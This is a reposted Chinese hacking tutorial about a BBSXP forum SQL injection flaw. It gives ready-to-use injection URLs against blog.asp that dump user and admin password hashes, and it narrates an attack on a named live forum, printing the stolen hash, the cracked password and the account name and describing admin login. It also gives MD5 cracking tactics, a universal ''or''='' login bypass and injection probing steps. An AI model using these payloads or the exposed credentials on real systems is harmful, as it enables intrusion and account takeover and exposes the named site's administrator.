码迷,mamicode.com
首页 > 其他好文 > 详细

BBSXP最新漏洞 简单注入检測 万能password

时间:2014-06-07 09:26:50      阅读:237      评论:0      收藏:0      [点我收藏+]

标签:c   class   blog   code   a   http   

BBSXP最新漏洞

漏洞日期:2005年7月1日
受害版本号:眼下全部BBSXP
漏洞利用:
查前台password注入语句:
blog.asp?id=1%20union%20select%201,1,userpass,username,1,1,1%20from%20[user]%20where%20membercode=5
查后台password注入语句:
blog.asp?id=1%20union%20select%201,1,adminpassword,username,1,1,1%20from%20[user]%20where%20membercode=5


首先打开www.google.com在输入Po......bBsxp5.15有非常多这种论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀究竟,bbsxp5.15最新漏洞 
漏洞主要出在BLOG.ASP 能够让直接构造数据库命令  
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 
后台区长的md5password就显示出来了。 
前台password也能够出来, 
网上已经有相关动画,软件。 
就利用这个漏洞,肯定有一批bbsxp的站点要倒下了 
接下来就是讲工具了,准备好MD5password破解器 
关于md5的破解,比較好使的有md5cracker速度增强版。 
1。先用8位或9位数字跑。非常快。 
2。假设不行,用小写字母跑。选择5-6位比較好。 
3。再不行,说明password可能使字母加数字,能够碰碰运气。能够配置一个精品自典,比方10G的, 
   跑上及几个小时。(你的机器配置必须非常好) 
4。再不行,建议放弃,太变态了。 
前台ok...后台password..(注:你必须知道管理员的帐号) 
直接默认的配置就是直接拿下后台password... 
直接吧前台md5password暴出来。 
剩下的事就事破解md5了。 
如今開始进行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig
他的password是7CB2BE65EB9F215215A0725A10B6E39E可能前台的password和后台一样,假设有2个加密password那就是代表1个是前台的一个是后台的,不多说了,看操作 
依照上面工具的介绍先用数字把, 
正在破===耐心等等 
我接条信息,大家不介意把~ 
出来了,password是82246124,登入,,他的帐号是wzwu,password82246124,登入成功,后台登入,password82246124,登入成功,以下的因该知道把,我也就不多说了,以免遭到人家的痛骂。 
bBsxp5.15最新漏洞的原始作者不清

74D2710BD75C06A057E842C8CA55C576


名‘or‘‘=‘password也是‘or‘‘=‘
 ‘
一般ASP系统都有相似以下的URL:http://www.xxx.com/xxx.ASP?ID=××,我们仅仅往在这种URL后加上一个单引號,假设返回server错误信息,那么就说明了程序并没有过滤单引號,并且从返回的错误信息中的了能够得到server的一些相关配置信息。接着接交http:/www.xxx.com/xxx.asp?id=××
      and 1=1、http:/www.xxx.com/xx.asp?id=×× and
      1=2,假设返回的页面不一样,说明页面能够注入。

BBSXP最新漏洞 简单注入检測 万能password,布布扣,bubuko.com

BBSXP最新漏洞 简单注入检測 万能password

标签:c   class   blog   code   a   http   

原文地址:http://www.cnblogs.com/mengfanrong/p/3770273.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!